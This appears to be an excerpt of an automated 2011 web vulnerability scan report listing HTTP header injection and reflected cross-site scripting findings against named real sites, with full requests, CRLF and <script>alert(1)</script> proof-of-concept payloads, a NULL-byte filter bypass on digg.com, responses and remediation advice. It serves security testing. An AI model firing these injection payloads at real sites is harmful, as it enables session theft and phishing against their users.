If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload eb2c3%0d%0ac4e6f30a34e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/?eb2c3%0d%0ac4e6f30a34e=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aknAVotlixeRqyTIZbDquGpe27Ln9Imlkp8wch2WkX3AtrQJwh7nR2notOkGxC47D1n1UeZbuEbyVrfbLBChVXDwM676UbUbcTbcOLTPA5BcbZc7y4F75TEVXP8j6ZbZbXTM7GQ4HmvGXUkYfKcQ7pLE2JCMdZcfwLeowgn6nFWZbt6sW3Xn0j2DDvcbp6auBCV7gTcFyAMahpMZdI1vamTskbxXeajVXPDsgoVU0L6KTMNpeuODZbZcqXtkXCKdT17l6TEEwcCVXDjPFaSetUpiHGHnnTXUMsYdwBEHRVd2w5skY4dSfQUlZaiZcqZcOO7Le3pyknX4y9Hi7f3AStgrZbGaucZbEWMcVVDdo0SCjXGTooHUh0Gha4GSmWtWZbdY8Zc4TR80rteXUEE6IpYSgLKFlcNibR2L4SnNT0bRZakoZdGgbZcZbQHGTo1foRG1RrYvAfyXEDh88AZcYqW8Xa2othNsyBuxtAoOhceVCMwBTMTFVPePZcawu2jB65xYEXVq4hl9dvIlwhbbIPjIB42lBOy3eBYIZdV8; path=/; domain=.tribalfusion.com; expires=Sun, 31-Jul-2011 22:21:59 GMT;
Content-Type: text/html
Location: ?eb2c3
c4e6f30a34e
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c8672%0d%0a22b17c10325 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/c8672%0d%0a22b17c10325/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB HTTP/1.1
Host: d.adroll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 02 May 2011 22:24:02 GMT
Connection: close
Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/c8672
22b17c10325
/U6PZANHGRBHQFBIDRUUZ3E/0d742ed1925a733b1b33d771e0b2e1a8.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.3. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /activity/activity.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 76bc1%0d%0ad390fd98756 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /activity/76bc1%0d%0ad390fd98756 HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
Location: http://go.techtarget.com//clicktrack-r/activity/76bc1
d390fd98756

Content-Type: text/html; charset=UTF-8
Content-Length: 104
Connection: close
Date: Mon, 02 May 2011 22:26:01 GMT

The URL has moved <a href="http://go.techtarget.com//clicktrack-r/activity/76bc1
d390fd98756">here</a>

3.4. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfr.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload a286d%0d%0a1880160ebae was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=a286d%0d%0a1880160ebae&dv=1&e=30d HTTP/1.1
Host: mfr.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rjZoABuGb

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:16:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: a286d
1880160ebae
=1; expires=Wed, 01-Jun-11 22:16:42 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660;path=/;httponly


3.5. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [dv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfr.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload cc980%0d%0a52522401ba6 was submitted in the dv parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=%20NEXTP2MBAN&dv=cc980%0d%0a52522401ba6&e=30d HTTP/1.1
Host: mfr.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rjZoABuGb

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 22:16:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: error converting 'cc980
52522401ba6
' value to numeric value [i]. request to 'mfr.247realmedia.com' for '/RealMedia/ads/adstream.cap/123', referer 'http://www.telecomitalia.it/', handler 'cap-add'
Cteonnt-Length: 620
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8345525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 620

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 56 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://api.zanox.com/json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zanox.com
Path:   /json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0413<script>alert(1)</script>b1e8f5dc312 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8?callback=zanox.cb.ZX624BF84E5DF10228E1C80f0413<script>alert(1)</script>b1e8f5dc312 HTTP/1.1
Host: api.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:14:05 GMT
Server: Apache-Coyote/1.1
Content-Type: application/javascript;charset=UTF-8
Connection: close
Content-Length: 18973

zanox.cb.ZX624BF84E5DF10228E1C80f0413<script>alert(1)</script>b1e8f5dc312({
"adspace": {"id": "505202"},
"status": "ACTIVE",
"apps": [{
"id": "B5FA7234356994251A1A",
"width": 1,
"height": 1,
"settings": {
"retargeter":
...[SNIP]...

4.2. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a6a5"><script>alert(1)</script>3089dd44574 was submitted in the REST URL parameter 1. This input was echoed as 7a6a5"><script>alert(1)</script>3089dd44574 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%007a6a5"><script>alert(1)</script>3089dd44574 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Tue, 03-May-2011 22:24:20 GMT; path=/; domain=digg.com
Set-Cookie: d=dccfbc2f283397329e5506de618d86128251d32808c7185a04fb2c98c432e3ec; expires=Sun, 02-May-2021 08:32:00 GMT; path=/; domain=.digg.com
X-Digg-Time: D=1570933 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16979

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%007a6a5"><script>alert(1)</script>3089dd44574.rss">
...[SNIP]...

4.3. http://expertsystem.net/clienti_dettaglio.asp [cd550 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /clienti_dettaglio.asp

Issue detail

The value of the cd550 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a45"><script>alert(1)</script>4f4293691b6 was submitted in the cd550 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clienti_dettaglio.asp?cd55097a45"><script>alert(1)</script>4f4293691b6 HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; __utmc=151171949; __utmb=151171949.1.10.1304392426

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 22:40:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9058
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/clienti_dettaglio.asp?lang=0&amp;cd55097a45"><script>alert(1)</script>4f4293691b6">
...[SNIP]...

4.4. http://expertsystem.net/clienti_dettaglio.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /clienti_dettaglio.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd550"><script>alert(1)</script>50bcce83c95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clienti_dettaglio.asp?cd550"><script>alert(1)</script>50bcce83c95=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 22:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9055
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/clienti_dettaglio.asp?lang=0&amp;cd550"><script>alert(1)</script>50bcce83c95=1">
...[SNIP]...

4.5. http://expertsystem.net/clienti_home.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /clienti_home.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cc3"><script>alert(1)</script>261686493f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clienti_home.asp?53cc3"><script>alert(1)</script>261686493f3=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 22:20:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9045
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/clienti_home.asp?lang=0&amp;53cc3"><script>alert(1)</script>261686493f3=1">
...[SNIP]...

4.6. http://expertsystem.net/demo_prodotti.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /demo_prodotti.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26cf"><script>alert(1)</script>2636baa7cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /demo_prodotti.asp?b26cf"><script>alert(1)</script>2636baa7cd0=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:20:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 23399
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/demo_prodotti.asp?lang=0&amp;b26cf"><script>alert(1)</script>2636baa7cd0=1">
...[SNIP]...

4.7. http://expertsystem.net/page.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /page.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a1"><script>alert(1)</script>a91230d7791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page.asp?655a1"><script>alert(1)</script>a91230d7791=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 22:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9029
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/page.asp?lang=0&amp;655a1"><script>alert(1)</script>a91230d7791=1">
...[SNIP]...

4.8. http://expertsystem.net/vetrinanews.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /vetrinanews.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5da"><script>alert(1)</script>e77b82b7423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vetrinanews.asp?1f5da"><script>alert(1)</script>e77b82b7423=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:20:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 14762
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/vetrinanews.asp?lang=0&amp;1f5da"><script>alert(1)</script>e77b82b7423=1">
...[SNIP]...

4.9. http://finanza-mercati.ilsole24ore.com/quotazioni.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /quotazioni.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1267"%3balert(1)//2fb7953fc53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1267";alert(1)//2fb7953fc53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotazioni.php?e1267"%3balert(1)//2fb7953fc53=1 HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:25:38 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 103141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Content
...[SNIP]...
antirmi che si ricarica la pagina corrente
var inputEl;

inputEl = document.createElement('input');
inputEl.type = "hidden";
inputEl.name = "e1267";alert(1)//2fb7953fc53";
inputEl.value = "1";
formEl.appendChild(inputEl);
inputEl = document.createElement('input');
inputEl.type = "hidden";
inputEl.name = "QUOTE
...[SNIP]...

4.10. http://geoisp.virgilio.it/geo.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://geoisp.virgilio.it
Path:   /geo.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e760<script>alert(1)</script>c08eaae6482 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /geo.php?callback=jsonp13043924108804e760<script>alert(1)</script>c08eaae6482&_=1304392445520 HTTP/1.1
Host: geoisp.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kp=173.193.214.243.1304374430919936; s_vi=[CS]v1|26DF965005079390-40000103C0028B28[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:19:01 GMT
Server: Apache
P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID", policyref="http://geoisp.alice.it/policy/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT CNT"
cache-control: private, must-revalidate, max-age=120
Content-Length: 68
Content-Type: text/html

